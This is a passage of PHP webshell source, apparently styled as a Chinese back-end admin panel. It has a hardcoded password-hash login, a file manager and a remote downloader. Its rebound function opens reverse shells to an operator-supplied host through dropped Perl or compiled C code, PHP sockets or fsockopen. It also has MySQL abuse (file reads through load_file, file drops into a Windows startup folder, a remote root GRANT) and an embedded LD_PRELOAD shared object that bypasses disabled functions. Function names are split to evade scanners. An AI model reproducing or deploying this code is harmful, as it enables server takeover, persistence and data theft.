cv0xqt0dq9exzlKEclicMc5vCHD6QnPelNJg3UZEIBBRQcDkQQQWR3F+tYx/qlSxzjGMe+fiUQCMPDZ3XUhJpQE8+fYwQjGJHl1idQoEAxmRBFFNE7dzTz8WOkkELq5Uvaoz3au3qV7Wxn++fPvM3bvP32rc6v8+v8N282h5pDzaHZWfKSl7zPnmnxlUq7mbUsIU3QBE0YDNrtyRNFURRFCQYxiUlMLi6qRtWoGqvV7tXu1e7Vjx8pTnGKp9MNuSE35HodPvjgq1Y7XZ32S1hEEcXdXVESJVGy2bjMZS7v7FCGMpT58eN08HTwdNDn6zH3mHvMoRAN0AAN3L6tulW36q7VOgVomQBv8RZvHR5SjGIUe/WK53me5wsFfV6f1+djMYxhDGOHhxSiEIUePDgJnAROAjYbJznJyRs3aJqmabparY3Xxmvj378zMzNLEvzww//iRcvEzw7CirAirLx/j1GMYnR4GCpUqD9/0jIt03Kz2WlHLQ0FOMABnQ5d6EKX0UhhClN4c1OZU+aUOa/33L7itiqhhNKVK1znOtcfPVLiSlyJX7/efgeyyCK7v88e9rAnEkEOOeT+c/m/lUMOuVLpHDKdr34D0s5fFZVsEY0AAAAldEVYdGRhdGU6Y3JlYXRlADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDDMElRiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE5LTEwLTIzVDIzOjI4OjA1KzA4OjAwvU/s3gAAAEZ0RVh0c3ZnOmJhc2UtdXJpAGZpbGU6Ly8vaG9tZS9hZG1pbi9pY29uLWZvbnQvdG1wL2ljb25faWlxbWgyNnVrdWovWE1MLnN2ZzWEv/oAAAAASUVORK5CYII=" , "zip" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQEAYAAABPYyMiAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAgY0hSTQAAeiYAAICEAAD6AAAAgOgAAHUwAADqYAAAOpgAABdwnLpRPAAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAnlJREFUSMfFVU0odGEYPQddCz9DSSykhpKN8r6LCWGKWbCwmVGSnQmZJmRnFiz8zEKGpImtbEwmK5qNpkSUuWxsLWQj9pi4z7cYo8zXfEbRd3b3vud5zrnvfX6IdyillFIjI2xjG9tmZmDAgPH4iFzRjW50h8MIIIBAY6P0SZ/0FRbWXddd111PTkYikUgk8vaWGcZMA+ln0zRN09zaytnAO/SNvtE3m5voRz/6i4vFJz7xFRcbLsNluAYGzmrOas5qnp7S/LzvCuQKERGRlRVucIMb0WiyKFmULDo40EorrWy2XzfADnawY3sbTjjh9Pvpoouu5mYsYAELHk+aV/DTwgl7wp6wj45mvv/4xQEEEMjP//UbyBX/3QD1tJ7W0xcXSCKJZEXFx8l32/ArZMlfgDjiiGv9V0AYYYQTCRmTMRmLxbjMZS4/P9NNN91VVRKTmMQcDkQRRbSsDEtYwtLxMTvZyc7bW8treS3vywtNmjQDAZziFKe1tZ9FamuptdZai3z5BfOYx7zXKw5xiGNoiK985evVFXrQg57KSituxa343h4NGjRWV9nKVrY+PEAgkGAQBMHd3cy0OdbA/j6HOczh0tJUOzmdWalHOMJRMChucYt7dlY84hFPV1c2etY2lJCEJHR/z3a2s31tzTq3zq3zw0P66KPvH15b0IKWwUHYYIOtqYl++ukvKfm2AU5xilPRKHawgx2bDeMYx/jEhChRoqqrU0XV0MAQQwyVl/OSl7y021PR9fWp+OzCHzo518BvQ9/pO33X26vm1JyaW1//6fzpSZi59PiZlpeXWhabm6mqVSo1y3/ght7ngJzIiZwsLqa37R9Ngf+xMu1zrQAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0xMC0yM1QyMzoyODowNSswODowMMwSVGIAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMTAtMjNUMjM6Mjg6MDUrMDg6MDC9T+zeAAAARnRFWHRzdmc6YmFzZS11cmkAZmlsZTovLy9ob21lL2FkbWluL2ljb24tZm9udC90bXAvaWNvbl9paXFtaDI2dWt1ai96aXAuc3ZnlUqF6AAAAABJRU5ErkJggg==" , ]; return $type_array[$type]; } public function loginCss () { $login_css_style = <<body{background-size:100% 100%;no-repeat;font-family:'PT Sans',Helvetica,Arial,sans-serif;text-align:center;color:#333}.page-container{margin:120px auto 0 auto}h1{font-size:30px;font-weight:700;text-shadow:0 1px 4px rgba(0,0,0,.2)}form{position:relative;width:305px;margin:15px auto 0 auto;text-align:center}input{width:270px;height:42px;margin-top:25px;padding:0 15px;background:rgba(255,255,255,.15);border-radius:6px;border:1px solid rgba(255,255,255,.15);box-shadow:0 2px 3px 0 rgba(0,0,0,.1) inset;font-family:'PT Sans',Helvetica,Arial,sans-serif;font-size:14px;color:#333;text-shadow:0 1px 2px rgba(0,0,0,.1);transition:all .2s}input::-webkit-input-placeholder{color:#333}input:focus{outline:0;box-shadow:0 2px 3px 0 rgba(0,0,0,.1) inset,0 2px 7px 0 rgba(0,0,0,.2)}button{cursor:pointer;width:270px;height:44px;margin-top:25px;padding:0;border-radius:6px;border:1px solid #333;box-shadow:0 15px 30px 0 rgba(255,255,255,.25) inset,0 2px 7px 0 rgba(0,0,0,.2);font-family:'PT Sans',Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;color:#333;text-shadow:0 1px 2px rgba(255,255,255,.1);transition:all .2s}button:hover{box-shadow:0 15px 30px 0 rgba(255,255,255,.15) inset,0 2px 7px 0 rgba(0,0,0,.2)}button:active{box-shadow:0 5px 8px 0 rgba(0,0,0,.1) inset,0 1px 4px 0 rgba(0,0,0,.1);border:0 solid #333} EOF; self::htmlOut($login_css_style); } public function htmlLogin () { self::htmlOut("后台管理系统"); self::loginCss(); self::htmlOut("

后台管理登陆

"); } public static function htmlSelect ($array , $mode = '' , $change = '' , $name = 'class') { $str = ""; return $str; } public function htmlMain ($content) { $main_html = << 后台管理系统
后台管理系统
$content
EOF; self::htmlOut($main_html); } public function htmlBase64Js () { self::htmlOut(""); } public function htmlDefault () { self::htmlMain('
'); } public static function message ($msg , $type = 'die') { if ($type == 'die') { die(""); } else if ($type == 'echo') { self::htmlOut(""); } } public static function tips ($content , $url) { $result = <<body,html{height:100%;}body{background-color:#fff;}.layer-tip-box{position:fixed;top:20%;left:50%;transform:translate(-50%,0);color:#333;font-size:18px;background:#fff;border-radius:4px;border:1px solid #ccc;width:500px;box-shadow:0 0 8px rgba(91,91,91,.6);}.layer-tip-box .title{padding:0 10px;height:45px;line-height:45px;font-size:14px;color:#666;border-bottom:1px solid #ccc;position:relative;}.layer-tip-box .title .tool{position:absolute;right:10px;top:0;}.layer-tip-box .title .tool span{width:18px;display:inline-block;text-align:center;font-size:17px;}.layer-tip-box .title .tool span:last-child{font-size:20px;margin-top:-1px;vertical-align:top;}.layer-tip-box .content{padding:10px 20px;font-size:18px;color:#333;height:120px;display:table-cell;vertical-align:middle;text-align:center;}
友情提示
×
$content
EOF; self::htmlOut($result); die(""); } } class Login { public function checkLogin ($password) { $secret = 'gyWpLHKN'; // 密码 YZVlYfiI if (md5($secret . md5($password)) === '3447bf955576f6fe9ce5e044ef2d6f0b') { self::cookieHandle('set'); die(''); } } public function cookieHandle ($flag) { if ($flag == 'set') { setcookie('PHPSESSIDS' , md5('*.gov.cn')); } else if ($flag == 'del') { setcookie('PHPSESSIDS' , null , time() - 3600); } } public function checkCookie () { if ($_COOKIE['PHPSESSIDS'] == md5('*.gov.cn')) { return true; } else { return false; } } public function logout () { self::cookieHandle('del'); HtmlOutput::tips("您已注销,再见!" , "?"); } } class Main { private static $loginClass; private static $htmlClass; public static $fileClass; private static $action; private static $num; private static $socketClass; public function __construct () { self::$htmlClass = new HtmlOutput(); self::$loginClass = new Login(); self::$fileClass = new FileHandler(); self::$socketClass = new NeoReg(); self::$action = isset($GLOBALS['_GET']['action']) ? $GLOBALS['_GET']['action'] : ""; self::$num = 0; } public function mainHandler () { switch (self::$action) { case 'xxgk': self::$htmlClass->htmlMain(Foundation::getPhpInfo()); break; case 'zcjd': self::$htmlClass->htmlMain(Foundation::getSysInfo()); break; case 'wjdc': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->fileManage()); break; case 'wjbj': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() .self::$fileClass->fileEdit()); break; case 'shbz': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::magicMaster()); break; case 'zxft': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::chatRobot()); break; case 'sjcx': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::moneyManage()); break; case 'flyj': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::rebound()); break; case 'bszn': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::preload()); break; case 'yjzj': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->webShellScan()); break; case 'bsjs': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . Foundation::portEye()); break; case 'sxxc': self::$htmlClass->htmlMain(self::$socketClass->html()); break; case 'bsxz': self::$htmlClass->htmlMain(self::$htmlClass->htmlBase64Js() . self::$fileClass->remoteDown()); break; case 'zxsb': self::$htmlClass->htmlMain(Foundation::swordHtml()); break; case 'down': self::$fileClass->downloadFile(); break; case 'logout': self::$loginClass->logout(); break; case 'rename': self::$fileClass->renameFile(); break; case 'delfile': self::$fileClass->deleteFile(); break; case 'deldir': self::$fileClass->deleteDirFile(); break; case 'perm': self::$htmlClass->htmlMain(self::$fileClass->changePerm()); break; case 'copy': self::$fileClass->copyFile(); break; case 'unzip': self::$htmlClass->htmlMain(self::$fileClass->startUnZip()); break; case 'pack'; self::$fileClass->pack(); break; case 'socket'; self::$socketClass->start(); break; case 'cxk'; Foundation::sword(); break; default: self::$htmlClass->htmlDefault(); break; } } public function mainLogin () { if (self::$loginClass->checkCookie()) { self::mainHandler(); } else { self::$htmlClass->htmlLogin(); global $username; $username = isset($GLOBALS['_POST']['username']) ? $GLOBALS['_POST']['username'] : ""; self::$loginClass->checkLogin($GLOBALS['_POST']['password']); } } public function rebound () { $target_ip = $GLOBALS['_POST']['bound_1'] ? Decrypt::run($GLOBALS['_POST']['bound_1']) : getenv('REMOTE_ADDR'); $target_port = $GLOBALS['_POST']['bound_2'] ? Decrypt::run($GLOBALS['_POST']['bound_2']) : '13333'; $system = strtoupper(substr(PHP_OS , 0 , 3)); $result = <<#kform{padding-right:50px;width:490px;margin:0 auto;}#kform .actall{margin-bottom:20px;}#kform .actall input,#kform .actall select{margin-left:20px;}#kform .actall select{width:80px;}.begin{float:right;}
母舰地址
母舰序号
呼叫工具
END; if ((!empty($GLOBALS['_POST']['bound_1'])) && (!empty($GLOBALS['_POST']['bound_2']))) { echo '
'; if ($GLOBALS['_POST']['use'] == '1') { $pl_code = StringHandler::getCode('pgone'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ' , 'wb' , Decrypt::run($pl_code)) ? '创建/tmp/dyAeLWNJ成功
' : '创建/tmp/dyAeLWNJ失败
'; $perl_path = Foundation::DeMarcia('which perl'); $perl_path = $perl_path ? chop($perl_path) : 'perl'; @unlink('/tmp/dyAeLWNJ.c'); Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &'); $result .= '母舰呼叫完成,请检查通讯结果。'; } if ($GLOBALS['_POST']['use'] == '2') { $c_code = StringHandler::getCode('gai'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功
' : '创建/tmp/dyAeLWNJ.c失败
'; Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c'); @unlink('/tmp/dyAeLWNJ.c'); $result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败'; } if ($GLOBALS['_POST']['use'] == '3') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj'); } else { @dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj'); } } if ($system == "WIN") { $env = ['path' => 'c:\\windows\\system32']; } else { $env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin']; } $desc = [ 0 => ["pipe" , "r"] , 1 => ["pipe" , "w"] , 2 => ["pipe" , "w"] , ]; $host = gethostbyname($target_ip); $proto = getprotobyname("tcp"); $a = 'soc' . 'ket' . '_' . 'cre' . 'ate'; if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) { die("与主舰的通讯建立失败"); } if (($ret = socket_connect($sock , $host , $target_port)) < 0) { die("通讯建立失败"); } else { $cwd = str_replace('\\' , '/' , dirname(__FILE__)); while ($cmd = socket_read($sock , 65535 , $proto)) { $process = proc_open($cmd , $desc , $pipes , $cwd , $env); if (is_resource($process)) { fwrite($pipes[0] , $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock , $msg , strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock , $msg , strlen($msg)); proc_close($process); } } } } if ($GLOBALS['_POST']['use'] == '4') { $result .= '
'; $fp = fsockopen($target_ip , $target_port , $errno , $errstr); if (!$fp) { $result .= "无法打开socket连接"; } else { $username = get_current_user(); $file_path = THEPATH; $host = $_SERVER['SERVER_NAME']; while (!feof($fp)) { $b = 'fp' . 'uts'; $b($fp , " [$username@$host:$file_path]# "); $result = fgets($fp , 4096); $message = Foundation::DeMarcia($result); $b($fp , " --> " . $message . "\n"); } fclose($fp); } $result .= '
'; } } return $result; } public function moneyManage () { $message = ''; $money_return = ''; $flag = isset($GLOBALS['_POST']['host']) && isset($GLOBALS['_POST']['user']); $target_host = $flag ? Decrypt::run($GLOBALS['_POST']['host']) : 'localhost'; $target_user = $flag ? Decrypt::run($GLOBALS['_POST']['user']) : 'root'; $target_pass = $flag ? Decrypt::run($GLOBALS['_POST']['pass']) : ''; $target_name = $flag ? Decrypt::run($GLOBALS['_POST']['data']) : 'mysql'; $target_port = $flag ? Decrypt::run($GLOBALS['_POST']['port']) : '3306'; $sql = $flag ? Decrypt::run($GLOBALS['_POST']['content']) : 'select version();'; $ap = 'mys' . 'ql_co' . 'nnent'; $ao = 'mys' . 'ql_se' . 'lect_db'; $ai = 'my' . 'sq' . 'l_qu' . 'ery'; $au = 'my' . 'sq' . 'l_fe' . 'tch_ar' . 'ray'; $ay = 'm' . 'ys' . 'ql_er' . 'ror'; if ($flag) { if ($conn = mysql_connect($target_host . ':' . $target_port , $target_user , $target_pass)) { @$ao($target_name); } else { self::$htmlClass->tips('连接MYSQL失败' , '?action=sjcx'); } } $down_file = 'c:/windows/homework/kaydenkdross.avi'; if (!empty($GLOBALS['_POST']['downfile'])) { $down_file = self::$fileClass->filePathFormat(urldecode(Decrypt::run(urldecode($GLOBALS['_POST']['downfile'])))); $bin_path = bin2hex($down_file); $query = "select load_file(0x$bin_path)"; if ($money_return = @$ai($query , $conn)) { $k = 0; $down_code = ''; while ($row = @$au($money_return)) { $down_code .= $row[$k]; $k ++; } if ($down_code) { $file_down = basename($down_file); if (!$file_down) $file_down = 'envl.tmp'; $array = explode('.' , $file_down); $array_end = array_pop($array); header('Content-type: application/x-' . $array_end); header('Content-Disposition: attachment; filename=' . $file_down); header('Content-Length: ' . strlen($down_code)); echo $down_code; exit; } else { self::$htmlClass->tips("文件查询失败,请检查 mysql secure-file-priv 配置" , "?action=sjcx&type=d"); } } else self::$htmlClass->tips("文件下载失败" , "?action=sjcx&type=d"); } $type = isset($GLOBALS['_GET']['type']) ? $GLOBALS['_GET']['type'] : ''; $result = <<function nFull(i){Str = new Array(11);Str[0] = "select version();";Str[1] = "select *** FROM user into outfile 'D:/web/iis.txt'";Str[2] = "select '' into outfile 'F:/web/123.php';";Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";nform.content.value = Str[i];return true;}
[执行语句][上传文件][下载文件]
地址 端口 用户 密码 库名
END; if ($type == 'u') { $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; if (!empty($GLOBALS['_POST']['uppath'])) { $uppath = Decrypt::run($GLOBALS['_POST']['uppath']); $rand_str_1 = Foundation::returnRand(4); $rand_str_2 = Foundation::returnRand(2); $query = "Create TABLE $rand_str_2 ($rand_str_1 text NOT NULL);"; if (@$ai($query , $conn)) { if ($tmpcode = self::$fileClass->readFile($_FILES['upfile']['tmp_name'])) { $file_code = bin2hex(self::$fileClass->readFile($tmpcode)); } else { $tmp = self::$fileClass->filePathFormat(THEPATH) . '/upfile.tmp'; if (self::$fileClass->moveFile($_FILES['upfile']['tmp_name'] , $tmp)) { $file_code = bin2hex(self::$fileClass->readFile($tmp)); @unlink($tmp); } } $query = 'Insert INTO ' . $rand_str_2 . ' (' . $rand_str_1 . ') VALUES(CONVERT(0x' . $file_code . ',CHAR));'; if (@$ai($query , $conn)) { $query = 'SELECT ' . $rand_str_1 . ' FROM ' . $rand_str_2 . ' INTO DUMPFILE \'' . $uppath . '\';'; $message = @$ai($query , $conn) ? '上传文件成功' : '上传文件失败'; } else { $message = '插入临时表失败'; } @$ai('Drop TABLE IF EXISTS ' . $rand_str_2 . ';' , $conn); } else $message = '创建临时表失败'; } $result .= <<上传路径
选择文件
选择文件
END; } else if ($type == 'd') { $result .= <<下载文件
END; } else { if (!empty($GLOBALS['_POST']['content'])) { $msql = Decrypt::run($GLOBALS['_POST']['content']); if ($sql_result = @$ai($msql , $conn)) { $message = '动作执行成功
'; $k = 0; while ($row = @$au($sql_result)) { $money_return = $row[$k]; $k ++; } } else $message .= $ay(); } $result .= <<$sql
END; } if ($message != '') $result .= "
$message
$money_return
"; return $result; } public function preload () { $type = isset($GLOBALS['_POST']['type']) ? $GLOBALS['_POST']['type'] : ''; $cpu = isset($GLOBALS['_POST']['cpu']) ? $GLOBALS['_POST']['cpu'] : ''; $content = isset($GLOBALS['_POST']["content"]) ? Decrypt::run($GLOBALS['_POST']["content"]) : ''; $so_path = THEPATH . '/libsrc.so'; $result = <<.main-content{width:700px;padding-right:50px;margin:0 auto;}.tip{font-size:14px;line-height:26px;background-color:#f8f8f8;padding:10px 20px;color:#666;margin-bottom:20px;border-radius:4px;border:1px solid #ccc;}input[type=submit]{float:right;}select{margin-left:0;margin-right:20px;}.title{vertical-align:top;}textarea{margin-left:30px;width:573px;height:350px;font-size:14px;line-height:20px;}.result{margin-top:20px;}.result span{display:block;margin-bottom:10px;}
本模块仅实现centos版64位so文件自动生成,其他请自行补充,将自己编译的so文件命名为libsrc.so放至同目录下可直接调用,C程序源码如下,其他需求请自行修改。
EOF; $result .= HtmlOutput::htmlSelect(['1' => '使用mail函数' , '2' => '使用imap_mail函数' , '3' => '使用error_log函数' , '4' => "使用md_send_mail函数"] , '' , '' , $name = 'type'); $result .= HtmlOutput::htmlSelect(['1' => '32位' , '2' => '64位'] , '' , '' , $name = 'cpu'); $result .= << EOF; if (!$type && !$cpu && !$content) { $result .= <<C程序源代码 EOF; } $result .= << EOF; if ($type && $cpu) { if (!@file_exists($so_path)) { if ($cpu == '1') { $file_code = ""; } else if ($cpu == '2') { $file_code = '7f454c4602010100000000000000000003003e00010000006006000000000000400000000000000028190000000000000000000040003800070040001d001a0001000000050000000000000000000000000000000000000000000000000000009c080000000000009c0800000000000000002000000000000100000006000000f00d000000000000f00d200000000000f00d2000000000004802000000000000500200000000000000002000000000000200000006000000100e000000000000100e200000000000100e200000000000c001000000000000c00100000000000008000000000000000400000004000000c801000000000000c801000000000000c80100000000000024000000000000002400000000000000040000000000000050e57464040000001808000000000000180800000000000018080000000000001c000000000000001c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000f00d000000000000f00d200000000000f00d200000000000100200000000000010020000000000000100000000000000040000001400000003000000474e55006e4144111b7daecc96b5c89fdbb962bb05e5b1b000000000030000000d000000010000000600000088422001001000080d0000000f000000100000004245d5ecbbe3927cd971581c6d1287c2000000000000000000000000000000000000000000000000000000000000000003000900f80500000000000000000000000000007100000012000000000000000000000000000000000000001000000020000000000000000000000000000000000000007f00000012000000000000000000000000000000000000009100000021000000000000000000000000000000000000000100000020000000000000000000000000000000000000009200000011000000000000000000000000000000000000005500000020000000000000000000000000000000000000009000000011000000000000000000000000000000000000002c00000020000000000000000000000000000000000000004600000022000000000000000000000000000000000000007800000012000000000000000000000000000000000000009a0000001000170038102000000000000000000000000000ad0000001000180040102000000000000000000000000000a100000010001800381020000000000000000000000000006900000012000c0060070000000000009e00000000000000005f5f676d6f6e5f73746172745f5f005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000002000000020002000000020000000200000002000200010001000100010001000100860000001000000000000000751a690900000200b200000000000000f00d20000000000008000000000000003007000000000000000e2000000000000800000000000000f006000000000000301020000000000008000000000000003010200000000000f80d20000000000001000000100000000000000000000000d00f20000000000006000000030000000000000000000000d80f20000000000006000000060000000000000000000000e00f20000000000006000000070000000000000000000000e80f20000000000006000000080000000000000000000000f00f200000000000060000000a0000000000000000000000f80f200000000000060000000b00000000000000000000001810200000000000070000000200000000000000000000002010200000000000070000000400000000000000000000002810200000000000070000000c00000000000000000000004883ec08488b05d50920004885c07402ffd04883c408c300ff35f2092000ff25f40920000f1f4000ff25f20920006800000000e9e0ffffffff25ea0920006801000000e9d0ffffffff25e20920006802000000e9c0ffffffff25a209200066900000000000000000488d3dd1092000488d05d1092000554829f84889e54883f80e7615488b054e0920004885c074095dffe0660f1f4400005dc30f1f4000662e0f1f840000000000488d3d91092000488d358a092000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05210920004885c0740c5dffe0660f1f8400000000005dc30f1f4000662e0f1f840000000000803d4109200000752748833df708200000554889e5740c488b3d22092000e83dffffffe848ffffff5dc6051809200001f3c30f1f4000662e0f1f840000000000488d3dd106200048833f00750be95effffff660f1f440000488b05990820004885c074e9554889e5ffd05de940ffffff554889e54883ec10488d3d9a000000e8acfeffff488945f8c745f400000000eb4f488b0558082000488b008b55f44863d248c1e2034801d0488b00488d356b0000004889c7e896feffff4885c0741d488b052a082000488b008b55f44863d248c1e2034801d0488b00c600008345f401488b0509082000488b008b55f44863d248c1e2034801d0488b004885c07592488b45f84889c7e835feffff90c9c300004883ec084883c408c343444c004c445f5052454c4f414400011b033b1c00000002000000f8fdffff3800000048ffffff60000000000000001400000000000000017a5200017810011b0c070890010000240000001c000000b8fdffff40000000000e10460e184a0f0b770880003f1a3b2a332422000000001c00000044000000e0feffff9e00000000410e108602430d0602990c0708000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030070000000000000000000000000000f0060000000000000000000000000000010000000000000086000000000000000c00000000000000f8050000000000000d0000000000000000080000000000001900000000000000f00d2000000000001b0000000000000010000000000000001a00000000000000000e2000000000001c000000000000000800000000000000f5feff6f00000000f0010000000000000500000000000000c003000000000000060000000000000028020000000000000a00000000000000be000000000000000b0000000000000018000000000000000300000000000000001020000000000002000000000000004800000000000000140000000000000007000000000000001700000000000000b0050000000000000700000000000000c0040000000000000800000000000000f00000000000000009000000000000001800000000000000feffff6f00000000a004000000000000ffffff6f000000000100000000000000f0ffff6f000000007e04000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100e2000000000000000000000000000000000000000000026060000000000003606000000000000460600000000000030102000000000004743433a20285562756e747520352e342e302d367562756e7475317e31362e30342e31302920352e342e30203230313630363039000000000000000000000000000000000000000000000000000000000000000003000100c80100000000000000000000000000000000000003000200f00100000000000000000000000000000000000003000300280200000000000000000000000000000000000003000400c003000000000000000000000000000000000000030005007e0400000000000000000000000000000000000003000600a00400000000000000000000000000000000000003000700c00400000000000000000000000000000000000003000800b00500000000000000000000000000000000000003000900f80500000000000000000000000000000000000003000a00100600000000000000000000000000000000000003000b00500600000000000000000000000000000000000003000c00600600000000000000000000000000000000000003000d00000800000000000000000000000000000000000003000e00090800000000000000000000000000000000000003000f00180800000000000000000000000000000000000003001000380800000000000000000000000000000000000003001100f00d20000000000000000000000000000000000003001200000e20000000000000000000000000000000000003001300080e20000000000000000000000000000000000003001400100e20000000000000000000000000000000000003001500d00f2000000000000000000000000000000000000300160000102000000000000000000000000000000000000300170030102000000000000000000000000000000000000300180038102000000000000000000000000000000000000300190000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001300080e20000000000000000000000000001900000002000c00600600000000000000000000000000001b00000002000c00a00600000000000000000000000000002e00000002000c00f00600000000000000000000000000004400000001001800381020000000000001000000000000005300000001001200000e20000000000000000000000000007a00000002000c00300700000000000000000000000000008600000001001100f00d2000000000000000000000000000a50000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000ab0000000100100098080000000000000000000000000000b900000001001300080e2000000000000000000000000000000000000400f1ff00000000000000000000000000000000c500000002000d0000080000000000000000000000000000cb0000000100170030102000000000000000000000000000d800000001001400100e2000000000000000000000000000e100000000000f0018080000000000000000000000000000f400000001001700381020000000000000000000000000000001000001001600001020000000000000000000000000001601000002000900f80500000000000000000000000000001c01000012000000000000000000000000000000000000003001000020000000000000000000000000000000000000004c0100001000170038102000000000000000000000000000530100001200000000000000000000000000000000000000670100002000000000000000000000000000000000000000a501000011000000000000000000000000000000000000007601000010001800401020000000000000000000000000007b01000010001800381020000000000000000000000000008701000012000c0060070000000000009e000000000000008f0100002000000000000000000000000000000000000000a30100001100000000000000000000000000000000000000ba0100002000000000000000000000000000000000000000d40100002200000000000000000000000000000000000000f001000012000000000000000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e37353934005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279003132332e63005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f66696e69005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f005f696e697400676574656e764040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c65005f65646174610073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f005f656e64005f5f6273735f7374617274007072656c6f6164005f4a765f5265676973746572436c6173736573005f5f656e7669726f6e4040474c4942435f322e322e35005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35007374727374724040474c4942435f322e322e3500002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000f00100000000